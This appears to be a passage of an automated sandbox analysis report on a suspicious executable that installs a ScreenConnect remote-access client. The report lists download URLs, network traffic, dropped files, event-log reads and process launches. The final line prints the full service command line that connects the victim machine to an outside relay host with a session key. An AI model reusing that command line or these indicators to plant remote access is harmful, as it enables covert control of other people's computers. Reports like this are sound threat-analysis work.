                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1830505627.0000000000BD4000.00000004.00000020.00020000.00000000.sdmp, 62C6HAPT.log.2.drString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicat
                  Source: dfsvc.exe, 00000002.00000002.2495706190.000001D45AFC0000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1830621372.0000000001178000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831031764.0000000001194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application%
                  Source: dfsvc.exe, 00000002.00000002.2494183832.000001D4591F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application1
                  Source: dfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application1CD
                  Source: dfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application5Qo
                  Source: dfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application89
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831031764.0000000001194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application9
                  Source: 62C6HAPT.log.2.drString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.or
                  Source: dfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationD
                  Source: dfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831031764.0000000001194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationNCD
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831273975.0000000002DBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationX
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831031764.0000000001194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationY
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831031764.0000000001194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationowsClienc
                  Source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EE6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationx
                  Source: dfsvc.exe, 00000002.00000002.2491755467.000001D457301000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.dll
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831273975.0000000002DBF000.00000004.00000800.00020000.00000000.sdmp, 62C6HAPT.log.2.drString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000002.00000002.2493129863.000001D459130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.manifestU
                  Source: dfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.manifestn1CD
                  Source: dfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43ED68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.exeO
                  Source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2495464552.000001D459317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000002.00000002.2474748099.000001D43F26F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windo
                  Source: dfsvc.exe, 00000002.00000002.2474748099.000001D43F26F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43ED68000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2495464552.000001D459317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000002.00000002.2495464552.000001D459317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windows.dll#
                  Source: dfsvc.exe, 00000002.00000002.2495260176.000001D4592E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000002.00000002.2493129863.000001D459130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                  Source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsCl
                  Source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000002.00000002.2495260176.000001D4592E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000002.00000002.2495260176.000001D4592E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configdZ
                  Source: dfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exea
                  Source: dfsvc.exe, 00000002.00000002.2494124496.000001D4591E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000002.00000002.2495260176.000001D4592E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: svchost.exe, 00000008.00000003.1468951555.00000189C5F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1468602840.00000189C5F2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689797301.00000189C5F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.9:49707 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.9:49727 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.9:49728 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.9:49729 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.9:49733 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Reads the Security eventlog
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Reads the System eventlog
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                  System Summary

                  barindex
                  Detected potential unwanted application
                  Source: khwHsyfsJ1.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B6A4950_2_00B6A495
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F7CA9D2_2_00007FF887F7CA9D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F7ABC52_2_00007FF887F7ABC5
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F7ED2F2_2_00007FF887F7ED2F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F65D322_2_00007FF887F65D32
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F4AEF52_2_00007FF887F4AEF5
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F5B0B02_2_00007FF887F5B0B0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F5327D2_2_00007FF887F5327D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F893492_2_00007FF887F89349
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F8A3B02_2_00007FF887F8A3B0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F724612_2_00007FF887F72461
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F460602_2_00007FF887F46060
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F631012_2_00007FF887F63101
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F412402_2_00007FF887F41240
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F4F4412_2_00007FF887F4F441
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF887F628702_2_00007FF887F62870
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF887F2758010_2_00007FF887F27580
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF887F21AC010_2_00007FF887F21AC0
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF887F21B3810_2_00007FF887F21B38
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 12_2_03CFD13F12_2_03CFD13F
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 12_2_0463ACD012_2_0463ACD0
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887F570BA13_2_00007FF887F570BA
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887F516FA13_2_00007FF887F516FA
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887F5173013_2_00007FF887F51730
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887F510CF13_2_00007FF887F510CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887F510D713_2_00007FF887F510D7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF88826DA5D13_2_00007FF88826DA5D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF88826560613_2_00007FF888265606
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF88826906D13_2_00007FF88826906D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF88826584413_2_00007FF888265844
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF888265A5913_2_00007FF888265A59
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF8882704F213_2_00007FF8882704F2
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF88827051D13_2_00007FF88827051D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF888265E9413_2_00007FF888265E94
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 652 -ip 652
                  Source: khwHsyfsJ1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.2.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal66.evad.winEXE@18/77@2/2
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B61000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00B61000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess652
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCommand line argument: dfshim0_2_00B61000
                  Source: khwHsyfsJ1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: khwHsyfsJ1.exeReversingLabs: Detection: 23%
                  Source: unknownProcess created: C:\Users\user\Desktop\khwHsyfsJ1.exe "C:\Users\user\Desktop\khwHsyfsJ1.exe"
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 652 -ip 652
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 844
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
